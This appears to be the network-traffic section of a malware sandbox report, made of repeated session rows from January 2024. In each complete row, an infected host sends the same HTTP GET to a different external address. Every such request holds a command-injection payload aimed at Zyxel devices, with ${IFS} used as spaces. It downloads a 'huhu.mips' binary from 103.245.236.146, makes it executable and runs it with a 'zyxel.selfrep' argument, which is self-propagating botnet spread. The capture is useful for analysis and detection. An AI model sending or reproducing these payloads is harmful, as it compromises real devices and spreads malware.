                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10192.168.2.235578697.95.96.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.787672043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11192.168.2.2347782130.116.147.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.787728071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12192.168.2.2339026209.181.217.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.787818909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13192.168.2.2341386192.69.44.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.787919998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14192.168.2.234734436.172.41.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.787949085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15192.168.2.234230038.195.8.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.788055897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16192.168.2.2339940205.180.102.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.788135052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17192.168.2.2345448143.148.182.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.788201094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18192.168.2.2338728123.86.110.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.788286924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19192.168.2.235707478.173.65.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.788377047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20192.168.2.233743819.210.131.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.788460016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21192.168.2.2360570145.9.128.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.788495064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22192.168.2.2342586131.233.101.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.788580894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23192.168.2.2332826143.35.54.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.788625956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24192.168.2.235040248.172.58.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.788700104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25192.168.2.234749423.118.204.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.788778067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26192.168.2.2360354148.181.1.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.788830996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                27192.168.2.235288450.78.61.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.788899899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                28192.168.2.234635414.80.107.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.788980961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                29192.168.2.2351002135.79.108.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.789056063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                30192.168.2.2345540177.21.65.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.789158106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                31192.168.2.233278065.215.216.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.789186001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                32192.168.2.234076872.216.24.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.789318085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                33192.168.2.23426765.118.45.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.789378881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                34192.168.2.235933474.36.109.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.789469957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                35192.168.2.2336082128.101.224.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.789565086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                36192.168.2.2346344194.71.171.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.789644957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                37192.168.2.2339560145.106.164.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.789745092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                38192.168.2.235776212.103.56.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.789832115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                39192.168.2.233922074.29.15.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.789894104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                40192.168.2.23494421.200.54.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.789918900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                41192.168.2.23354544.8.184.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.789983034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                42192.168.2.2358398133.138.24.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.790039062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                43192.168.2.2348258173.246.193.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.790103912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                44192.168.2.2346080185.43.2.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.790149927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                45192.168.2.2339708195.96.124.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.790201902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                46192.168.2.2359626155.94.161.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.790261984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                47192.168.2.233758494.62.54.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.790333033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                48192.168.2.2350876196.128.50.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.790369034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                49192.168.2.2358780204.37.165.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.790467978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                50192.168.2.2341314168.248.186.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.790517092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                51192.168.2.2349250108.166.249.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.790638924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                52192.168.2.23337045.230.60.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.790638924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                53192.168.2.2358408207.210.225.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.790716887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                54192.168.2.2344188188.198.105.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.790752888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                55192.168.2.235918881.199.89.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.790867090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                56192.168.2.235245263.117.176.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.790921926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                57192.168.2.2360070154.109.149.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.790951967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                58192.168.2.233708814.224.251.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.791503906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                59192.168.2.2342682198.145.207.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.791553020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                60192.168.2.235737473.20.23.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.791591883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                61192.168.2.234411094.244.93.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.791698933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                62192.168.2.2351940168.240.136.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.791748047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                63192.168.2.235809645.187.181.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.791789055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                64192.168.2.235038280.227.20.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.791976929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                65192.168.2.2358470122.234.107.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.792093039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                66192.168.2.2335548209.122.220.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.792231083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                67192.168.2.236032879.73.63.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.792279005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                68192.168.2.233643689.131.80.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.792927980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                69192.168.2.2356292130.162.58.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.792980909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                70192.168.2.2357692109.250.207.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.793072939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                71192.168.2.2347558129.94.128.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.793123960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                72192.168.2.233493849.128.48.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.793158054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                73192.168.2.2347436209.42.140.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.793333054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                74192.168.2.2348198128.100.89.149443
                                                TimestampBytes transferredDirectionData
